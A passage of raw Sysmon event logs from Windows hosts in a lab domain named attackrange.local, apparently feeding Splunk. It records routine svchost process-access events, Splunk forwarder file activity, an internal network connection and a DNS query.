12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345212Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345211Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345210Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345209Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345208Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345207Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345206Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345205Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345204Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345203Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345202Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345201Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345200Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345199Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345198Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345197Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345196Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345195Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345194Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345193Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345192Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8898-6164-8200-00000000F101}4920C:\Windows\System32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345191Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8898-6164-8200-00000000F101}4920C:\Windows\System32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345190Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8898-6164-8200-00000000F101}4920C:\Windows\System32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345189Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8898-6164-8200-00000000F101}4920C:\Windows\System32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345188Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2D-618D-C4DA-04000000F101}8884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345187Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2D-618D-C4DA-04000000F101}8884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057345186Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.135{8B6011A9-886D-6164-0D00-00000000F101}904924C:\Windows\system32\svchost.exe{8B6011A9-8B2D-618D-C4DA-04000000F101}8884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000057345185Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.088{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345184Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:49.088{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8CEB6BE9D391F45C1567076391CE39A,SHA256=2B1E17AA996FC3ECFC776103AF23B99ADE02E28C4D0DE9B1D7F52D13A4FA7E78falsetrue 23542300x800000000000000021219542Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:49.070{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93911DEBC1E1F02DA891BD8774199785,SHA256=E57CED94E722B1DCE871D603AC79202252894D56BE28DB5108C198A63B57D1A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219541Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:49.070{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D5F0A262362BE6B3533B2B04062B631B,SHA256=8482660931A8D1C5B4392B849EE275F0D950E095CDC1D823F64CE81274B35F72,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219545Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:50.352{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=134CE19F81DBFDA8201888E87718DCD3,SHA256=3C1A16668A1A9ABFECD2AA5FE7B2C67414E46B059EEECEDFEE8DE57DF18CEA64,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000021219544Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:36.491{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64318-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x800000000000000057345222Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:21.272{8B6011A9-887D-6164-2D00-00000000F101}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-469.attackrange.local56403- 11241100x800000000000000057345221Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:50.135{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345220Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:50.135{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 